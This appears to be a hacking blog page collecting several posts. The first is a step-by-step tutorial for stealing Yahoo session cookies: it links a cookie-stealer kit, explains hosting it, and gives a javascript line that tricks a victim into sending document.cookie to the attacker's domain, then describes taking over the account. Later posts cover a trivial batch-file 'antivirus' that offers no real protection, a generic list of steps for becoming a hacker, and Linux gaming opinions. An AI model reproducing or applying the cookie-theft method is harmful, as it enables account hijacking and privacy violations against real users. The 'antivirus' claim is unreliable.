Hack Yahoo accounts with Session IDs or session cookies !

What are session IDs or session cookies ? 

Talking in simple language, whenever we sign into an account it generates a unique piece of string. One copy is saved on server and other in our browser as cookie. Both are matched every time we do anything in our account. This piece of string or login session is destroyed when we click on 'Sign Out' option.

Just login to yahoo.com. Type in browser javascript:alert(document.cookie);

You would get a pop up box showing you the cookies. Now login to your account and do same thing, you would see more elements added to the cookies. These represent sessions ids .

Note: By saying , stealing sessions or stealing cookies, I mean the same thing. Sessions are stored in our browser in form of cookies.

 An attacker can steal that session by convincing victim to run a piece of code in browser. Attacker can use that stolen session to login into victim's account without providing any username/password. This attack is very uncommon because when the victim  clicks 'Sign out' , session gets  destroyed and attacker too also gets signed out. 

But in case of yahoo, its not the same.The attacker doesn't get signed out when victim clicks 'Sign out'. Though the session automatically gets destroyed after 24hrs  by yahoo. But when user simply refreshes the windows in yahoo account, he gets sessions for next 24 hrs. This means, once the  yahoo account session is stolen , attacker can access the account for life time by refreshing window in every 24hrs. I am not actually sure whether its 24 or 48 hrs.

Requirement: Download some files from here 

http://www.ziddu.com/downloadlink/13712247/cookiestealer.rar

Tutorial to steal session IDs :-

1. Sign Up for an account at any free webhosting site. I have chosen my3gb.com.

2.  Login to your account and go to file manager. Upload the four files that you have just downloaded.

    Make a new directory 'cookies' here.

3. Give this  code to victim to run in his browser when he would be logged in to his yahoo account. Yahoo.php is basically cookie stealing script and hacked.php executes the stolen cookies in browser.

Stolen cookies get stored in directory 'cookies'

javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie)); 

He would again redirected to his yahoo account.

4. Open the hacked.php . The password is 'explore'.

You must have got the username of victim's account. Simply Click on it and it would take you to inbox of victim's yahoo account without asking for any password.

Now it doesn't matter if victim signs out from his account, you would remain logged into it.

Note: You can try this attack by using two browsers. Sign into yahoo account in one browser and run the code. Then sign in through other browser using stolen session.

Read More

How To Make Your Own Antivirus

The main functioning of Antivirus is to detect and remove harmful or unwanted files which may slow down your computer and windows . 
But if you don't have enough time to download any best antivirus. Then simply use this trick to make your own antivirus. This antivirus scan by using command prompt and delete unwanted files automatically.


Open your Notepad and paste this given code

@ echo off title Antivirus echo Antivirus echo created by your name :start if exist virus.batgoto infected if not exist virus.bat goto clean cd C:\Windows\system32 :infected echo warning virus detected del virus.bat pause goto start :clean echo System secure! pause exit

now save your file with Trickshood.bat and select "All files" now run your saved files automatically scan starts

Read More

12 Simple Steps To Become A Hacker

Hacking is an engaging field but it is surely not easy. To become a hacker one has to have an attitude and curiosity of learning and adapting new skills. You must have a deep knowledge of computer systems, programming languages, operating systems and the journey of learning goes on and on. Some people think that a hacker is always a criminal and do illegal activities but they are wrong. Actually many big companies hirehackers to protect their systems and information and are highly paid. We have prepared a list of 12 most important steps necessary to become a hacker, have a deeper look

1. Learn UNIX/LINUX

UNIX/LINUX is an open source operating system which provides better security to computer systems. It was first developed by AT&T in Bell labs and contributed a lot in the world of security. You should install LINUX freely available open source versions on your desktops as without learning UNIX/LINUX, it is not possible to become a hacker.

2. Code in C language 

C programming is the base of learning UNIX/LINUX as this operating system is coded in C programming which makes it the most powerful language as compared to other programming languages. C language was developed by Dennis Ritchie in late 1970’s. To become a hacker you should master C language.

3. Learn to code in more than one Programming Language

It is important for a person in the hacking field to learn more than one programming. There are many programming languages to learn such as Python, JAVA, C++. Free eBooks, tutorials are easily available online.

4. Learn Networking Concepts

Another important and essential step to become a hacker is to be good at networking concepts and understanding how the networks are created. You need to know the differences between different types of networks and must have a clear understanding of TCP/IP and UDP to exploit vulnerabilities (loop holes) in system.

Understanding what LAN, WAN, VPN, Firewall is also important.

You must have a clear understanding and use of network tools such as Wireshark, NMAP for packet analyzing, network scanning etc.

5. Learn More Than One Operating Systems 

It is essential for a hacker to learn more than one operating system. There are many other Operating systems apart from Windows, UNIX/LINUX etc. Every system has a loop hole, hacker needs it to exploit it.

6. Learn Cryptography

To become a successful hacker you need to master the art of cryptography. Encryption and Decryption are important skills in hacking. Encryption is widely done in several aspects of information system security in authentication, confidentiality and integrity of data. Information on a network is in encrypted form such as passwords. While hacking a system, these encrypted codes needs to be broken, which is called decryption.

7. Learn more and more about hacking

Go through various tutorials, eBooks written by experts in the field of hacking. In the field of hacking, learning is never ending because security changes every day with new updates in systems.

8. Experiment A Lot

After learning some concepts, sit and practice them. Setup your own lab for experimental purpose. You need a good computer system to start with as some tools may require powerful processor, RAM etc. Keep on Testing and learning until you breach a system.

9. Write Vulnerability (Loop hole program)

Vulnerability is the weakness, loop hole or open door through which you enter the system. Look for vulnerabilities by scanning the system, network etc. Try to write your own and exploit the system.

10. Contribute To Open Source Security Projects

An open source computer security project helps you a lot in polishing and testing your hacking skills. It’s not a piece of cake to get it done. Some organizations such as MOZILLA, APACHE offer open source projects. Contribute and be a part of them even if your contribution is small, it will add a big value to your field.

11. Continue never ending Learning 

Learning is the key to success in the world of hacking. Continuous learning and practicing will make you the best hacker. Keep yourself updated about security changes and learn about new ways to exploit systems

12. Join Discussions and meet hackers 

Most important for a hacker is to make a community or join forums, discussions with other hackers worldwide, so that they can exchange and share their knowledge and work as a team. Join Facebook groups related to hacking where you can get more from experts.

Read More

Is using Linux as primary operating system on gaming computer a great idea!

Million dollar question : Should you install Linux on a gaming laptop?

Linux was developed by Linus Torvalds at the University of Helsinki in Finland. It was inspired by Minix, a small Unix System. It is simply an Operating System. It was introduced in October 1991.

The first official version was Linux 0.02. In 2001, 2.4 version was released. It is developed under GNU license, which allows the source code of Linux to be distributed freely. Linux is used for networking, software development and web hosting. The features of Linux are:

1. Multi user capability.

2. Multi tasking.

3. Security.

4. Portability.

There are two ways of installing Linux – CUI (Character User Interface) and GUI (Graphical User Interface).

The kernel is central to the system. It interacts with hardware directly. Without this, the operating system does not exist. The shell is a program written in ‘C’ language. Shell interacts with user, whereas kernel interacts with hardware. The different types of shell are Bourne shell, C shell and k shell. The applications are the one that run on the operating system.

Linux is everywhere these days, and many hardcore gamers have much more game to play on Linux than ever before. However many gamers who have Windows PCs are apprehensive about installing Linux as a primary operating system on their gaming rigs.

One redditor asked about it on the Linux subreddit and got some interesting answers from his fellow Linux users. Redditor Hentaichrist asked the following question :

I’m getting a new laptop(lenovo y70) in a couple days. I’m a really big gamer and that’s the bulk of what I’ll be using it for. I’m weary of windows 10 though and I don’t really prefer it over win7. Would it be worth it to use Linux and would my games be compatible? Also what version should I use if I were to.

Here are some of the answers that he received.

CaptainRobotnik: “I don’t think Linux is particularly well suited for your use case…. You could try disabling Nvidia Optimus and install an easy distro like Ubuntu with the proprietary Nvidia drivers, but once you start trying to install your Windows games via WINE you’re going to have a bad time.”

Swordgeek: “You’ll have to boot into Windows for almost all of your games.”

Derpypeasant: “If you are seriously into gaming, Linux is not going to be for you, unless you like what is on the Steam-Linux list. I honestly don’t see the point in Linux unless you are interested in open-source software or software freedom.”

Jonne: “If I cared enough about gaming, I’d dual-boot. Have Windows be the games part, do all your other stuff in Linux.”

Danaholic86: “Dual boot unbuntu on it. Gaming on Linux is a rather….. disappointing….. experience as of now.”

Prozaker: “I also have the same brand of computer and I had to double boot from the start. I like games and I know that Linux is not the best gaming platform at the moment.

I have windows 8 and Xubuntu running on the same laptop one for games and the other one is for work and I really like how it plays out. After 5 I just reboot and log on into Windows.”

BulletDust: “On the contrary I find Linux gaming support to be increasing in leaps and bounds. Running Nvidia hardware and propiratry drivers I’m loving playing UT4 Alpha, TF2, Portal 2, Torchlight II, CS:GO and many others. I’m actually experiencing better performance under Linux than I was under Windows.

Honestly, I never thought I’d see the day!

I have a very capable Windows 10 rig here, all it does if play BF4….”

Rcboy147: “You are asking an entire subreddit that loves linux, the question would be YES!

But I think in your case dual-booting Windows 7 is your best bet, you can get things working well in linux but it does take time and 95% of the time you will not get it working the way you want it to.

I currently dual boot Windows 7 and Linux mint, and find it easy to switch because SSD time reboot doesn’t take that long. it is sometimes a pain wanting to switch to do ONE thing but I normally have a linux laptop around that I can do my shit on while needing to be on windows.

I also recommend using an old laptop that no-one uses anymore and install linux on something like that so you can learn and have a play around with it to see if you like it.”

Adevland: “Get linux mint. You can easily switch between the integrated & dedicated gpus. Depending on what games you play you might actually be surprised to see how many of them have native linux ports. Currently 6/10 top played games on steam work on linux. And whatever you do don’t use wine. You will end up being frustrated and blame it on linux (although it’s not it’s fault).”

Uph: “I’d recommend Ubuntu unless you have a specific reason to use something else. It’s the most popular option which makes support easy. We don’t know what games you play, but you can see for yourself on https://appdb.winehq.org/ or see if the game is available for GNU/Linux on Steam. If your games aren’t compatible you could always dual boot.”

While many redditors may have opposing views, with the increased snooping issues on Windows 10, it is worthwhile to have a Linux OS aboard your PC. With more and more games being launched for Linux, it is better to opt for Linux in long run.

Read More